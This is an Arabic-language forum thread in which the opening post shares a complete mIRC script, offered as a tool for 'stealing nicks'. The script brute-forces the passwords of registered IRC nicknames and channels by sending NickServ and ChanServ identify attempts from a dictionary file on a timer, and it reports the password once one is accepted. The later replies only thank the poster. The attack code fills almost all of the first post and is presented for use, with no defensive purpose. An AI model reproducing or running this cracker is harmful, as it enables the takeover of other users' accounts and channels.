
لا يوجد إعلان حتى الآن.

امـر لسرقـه النكات

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إلغاء تحديد الكل
مشاركات جديدة

  • امـر لسرقـه النكات

    شباب هذا امر لسرقه النكات وانشالله يعجبكم


    تحطه بالرموت طبعاً

    alias crack.nick {
    /msg nickserv identify %crack.nick $read -l $+ %crack.nick.line %crack.nick.dic
    /inc %crack.nick.line 1
    if (%crack.nick.line > %crack.nick.max) { /echo 4 *** You have reached the end of your dictionary file, and none of the passwords worked. All variable have been reset. | /timer500 off | /unset crack.nic* | /disable #crack.nick }

    alias crack.chan {
    /msg chanserv identify %crack.chan $read -l $+ %crack.chan.line %crack.chan.dic
    /inc %crack.chan.line 1
    if (%crack.chan.line > %crack.chan.max) { /echo 4 *** You have reached the end of your dictionary file, and none of the passwords worked. All variable have been reset. | /timer501 off | /unset crack.cha* | /disable #crack.chan }

    alias /crack.nick.start {
    if (%crack.nick == $null) { /echo 4 *** No Nick was entered -- Halted | /timer500 off | /halt }
    if (%crack.nick.line == $null) { /echo 4 *** No line was entered -- Halted | /timer500 off | /halt }
    if (%crack.nick.dic == $null) { /echo 4 *** No dictionary file was entered -- Halted | /halt | /timer500 off }
    if (%crack.nick.speed == $null) { /echo 4 *** No speed entered, defualting to 3. | set %crack.nick.speed 3 }
    if ($exists(%crack.nick.dic) == $false) { /echo 4 *** The dictionary file entered is not valid, this means that it dose not exist in the directory u specified. -- Halted | /halt }
    set %crack.nick.max $lines(%crack.nick.dic)
    /timer500 %crack.nick.max %crack.nick.speed /crack.nick
    enable #crack.nick
    /echo 4 *** Crack has been started, Cracking %crack.nick useing dictionary file %crack.nick.dic starting on line %crack.nick.line and timeout = %crack.nick.speed , please ignore the text that will follow.

    alias /crack.chan.start {
    if (%crack.chan == $null) { /echo 4 *** No Channel was entered -- Halted | /timer500 off | /halt }
    if (%crack.chan.line == $null) { /echo 4 *** No line was entered -- Halted | /timer500 off | /halt }
    if (%crack.chan.dic == $null) { /echo 4 *** No dictionary file was entered -- Halted | /timer500 off | /halt }
    if (%crack.chan.speed == $null) { set %crack.chan.speed 5 }
    if ($exists(%crack.chan.dic) == $false) { /echo 4 *** The dictionary file entered is not valid, this means that it dose not exist in the directory u specified. -- Halted | /halt }
    set %crack.chan.max $lines(%crack.chan.dic)
    /timer501 %crack.chan.max %crack.chan.speed /crack.chan
    enable #crack.chan
    /echo 4 *** Crack has been started, Cracking %crack.chan useing dictionary file %crack.chan.dic starting on line %crack.chan.line and timeout = %crack.chan.speed , please ignore the text that will follow.

    menu status,menubar {
    !Password Cracker!
    .Nick Cracker
    ..Start: /crack.nick.start
    ..Pause: /timer500 off | /echo 4 *** The crack has been paused, your on line %crack.nick.line , none of the variables have been unset, hit Start to start again. | disable #crack.nick
    ..Stop: /timer500 off | /echo 4 *** You ended on line %crack.nick.line incase u need to continue the crack later. | /unset %crack.nic* | /disable #crack.nick
    ..Simple Setup
    ...Set Nick: { set %crack.nick $$?="Nick To Crack" } | { set %crack.nick.dic c:\wicked\cracker\dic.txt } | { set %crack.nick.line 1 } | { set %crack.nick.speed 3 }
    ..Pro Setup
    ...Set Nick: { set %crack.nick $$?="Nick To Crack" }
    ...Set Dic: { set %crack.nick.dic $dir="Dictionary File" c:\*.* }
    ...Set Line: { set %crack.nick.line $$?="Line of the dic file to start on" }
    ...Speed: { set %crack.nick.speed $$?="Pause between identifys?(3)" }
    ..Reset Crack: /unset %crack.nic* | /echo 4 *** All variables for the Nick Cracker have been reset.
    .Chan Cracker
    ..Start: /crack.chan.start
    ..Pause: /timer501 off | /echo 4 *** The crack has been paused, your on line %crack.chan.line , none of the variables have been unset, hit Start to start again. | disable #crack.chan
    ..Stop: /timer501 off | /echo 4 *** You ended on line %crack.chan.line incase u need to continue the crack later. | /unset %crack.cha* | disable #crack.chan
    ..Simple Setup
    ...Set Chan: { set %crack.chan $$?="Channel To Crack(remember the #)" } | { set %crack.chan.dic c:\wicked\cracker\dic.txt } | { set %crack.chan.line 1 } | { set %crack.chan.speed 5 }
    ..Pro Setup
    ...Set Chan: { set %crack.chan $$?="Channel To Crack(remember the #)" }
    ...Set Dic: { set %crack.chan.dic $dir="Dictionary File" c:\*.* }
    ...Set Line: { set %crack.chan.line $$?="Line of the dic file to start on" }
    ...Speed: { set %crack.chan.speed $$?="Pause between identifys?(5)" }
    ..Reset Crack: /unset %crack.cha* | /echo 4 *** All variables for the Channel Cracker have been reset.

    #crack.nick off
    on 1:NOTICEPassword accepted for $me *:/halt
    on 1:NOTICEThat nick isn't registered*:/echo 4 *** The Nick you are cracking isn't registered. All the variables have been reset, and the crack stoped. | /timer500 off | /disable #crack.nick | /unset crack.nic*
    on 1:NOTICEPassword accepted for*:{
    /timer500 off
    /echo 4 *** A password was accepted for %crack.nick , the password is | /dec %crack.nick.line 1 | /echo 4 $read -l $+ %crack.nick.line %crack.nick.dic , Everything has been reset, u ended on | /inc %crack.nick.line 1 | /echo 4 line %crack.nick.line incase some thing went wrong. | disable #crack.nick
    /unset %crack.nic*
    #crack.nick end

    #crack.chan off
    on 1:NOTICEThat channel isn't registered*:/echo 4 *** The Channel you are cracking isn't registered. All the variables have been reset, and the crack stoped. | /timer501 off | /disable #crack.chan | /unset crack.cha*
    on 1:NOTICEPassword accepted for channel*:{
    /timer501 off
    /echo 4 *** A password was accepted for %crack.chan , the password is | /dec %crack.chan.line 1 | /echo 4 $read -l $+ %crack.chan.line %crack.chan.dic , Everything has been reset, u ended on | /inc %crack.chan.line 1 | /echo 4 line %crack.chan.line incase some thing went wrong. | disable #crack.chan
    /unset %crack.cha*
    #crack.chan end

    on everyone:LOAD: {
    echo 4 BEEFY Inc's WiCkEd IRC password Cracker 1.3 By BEEFCAKE has been loaded.
    echo 4 http://www.thepentagon.com/beefcake [email protected]

    [IMG]D:\&#00&#00&#00&#00&#00&#00&#00&#00s and Settings\Administrator\Desktop[/IMG]

    BROTHERS أحد مؤسسي هذا الموقع الرآئـع
    رقم العضويه : 9

  • #2

    تسلم برثر علي هالامر الكراك هذا ويعطيك العافيه والله



    • #3
      يعطيك الف عافيه اخوى


      • #4
        مشكـووور آخـوووي ويعطيك العاافيه :]


        • #5
          مــأفهمت شي :p

          بس يسلموو


          • #6
            مشكور على الموضوع


            • #7
              قوااك الله ع الموضوع


              • #8
                شكرا على هالموضوع المفيد


                • #9
                  يعطيك العافيه

                  مشتآقلكم بس الظروف تخلي الوأحـد


                  • #10
                    الف شكر ع الموضوع

                    مــوت الم ـشاعر بعض الاحيان رأح ــه

